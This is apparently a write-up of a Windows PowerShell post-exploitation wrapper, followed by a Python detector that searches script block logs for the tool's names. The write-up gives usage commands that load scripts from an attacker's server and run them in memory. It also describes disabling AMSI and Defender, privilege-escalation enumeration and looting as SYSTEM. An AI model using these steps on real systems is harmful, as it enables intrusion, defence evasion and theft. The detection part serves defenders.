CRIMSON WISP
Windows Post-Exploitation tools wrapper.
INTRODUCTION
A quick tour of a tool that automates post-exploitation tasks.
FUNCTIONALITIES
First set the URL that the rest of the functions will use, then load the scripts:
Invoke-Wisp -Url http://<your_server>
. memory_load
Make sure you have write permissions to the current directory.
- Enumerating the system for privilege escalation.
escalation
- Looting the system after escalating to NT AUTHORITY\SYSTEM.
looting
THE CODE
The main features of the program are those mentioned above. However, the program does much more behind your back. The tool code is shown below. It will probably change in the future, but the main idea will be the same.
Invoke-Wisp
This function sets the global variable URL, which will be used for downloading.
Invoke-Wisp will automatically use the bypass_amsi function described below.
Bypass_AMSI
This function downloads the isma.txt file, which turns off AMSI.dll and thus Microsoft Defender in PowerShell memory.
Memory_Load
This function downloads PowerShell scripts and loads them into memory. You can add your own scripts here so they are all downloaded with one command.
Make sure you dot source the function when you use it, so that the scripts are loaded into the global scope. Otherwise, the scripts are loaded only in the function's scope and will not run globally.
Escalation
This function downloads the escalate.txt file and runs it in PowerShell memory. The file executes a series of commands for privilege escalation enumeration and, at the end, reminds the user about a few additional manual checks.
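For defenders, the function and file names described above are the strings that would surface in PowerShell script block logging (Event ID 4104). The following is an added example, not part of the tool or the original article: it scans script block text for those names and flags hosts where several of them appear. The record layout (host, event_id, script_block_text), the host names and the sample events are constructed assumptions.

```python
import re
from collections import defaultdict

# Function and file names taken from the article. PowerShell is
# case-insensitive, so matching is too. "escalation" and "looting" are
# left out: as ordinary words they are too noisy to alert on alone.
INDICATORS = ["Invoke-Wisp", "bypass_amsi", "memory_load", "isma.txt", "escalate.txt"]
PATTERNS = {
    name: re.compile(r"(?<![\w.-])" + re.escape(name) + r"(?![\w-])", re.IGNORECASE)
    for name in INDICATORS
}
SCRIPT_BLOCK_EVENT_ID = 4104  # PowerShell script block logging


def scan(events):
    """Return {host: sorted indicator names seen in its script block text}."""
    hits = defaultdict(set)
    for ev in events:
        if ev["event_id"] != SCRIPT_BLOCK_EVENT_ID:
            continue  # only script block records carry the text we match on
        for name, pattern in PATTERNS.items():
            if pattern.search(ev["script_block_text"]):
                hits[ev["host"]].add(name)
    return {host: sorted(names) for host, names in hits.items()}


def flagged(events, min_distinct=2):
    """Hosts where at least min_distinct different indicators appeared."""
    return {h: n for h, n in scan(events).items() if len(n) >= min_distinct}


# Constructed sample records (assumed flattened layout, not a real export).
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 4104, "script_block_text": "Invoke-Wisp -Url http://server.example"},
    {"host": "WS01", "event_id": 4104, "script_block_text": ". MEMORY_LOAD"},
    {"host": "WS01", "event_id": 4104, "script_block_text": "escalation"},
    {"host": "WS02", "event_id": 4104, "script_block_text": "Get-ChildItem C:\\Users"},
    {"host": "WS03", "event_id": 4104, "script_block_text": "Get-Content .\\notes\\escalate.txt"},
    {"host": "WS04", "event_id": 4103, "script_block_text": "Invoke-Wisp; bypass_amsi"},
]

if __name__ == "__main__":
    for host, names in flagged(SAMPLE_EVENTS).items():
        print(host, names)
```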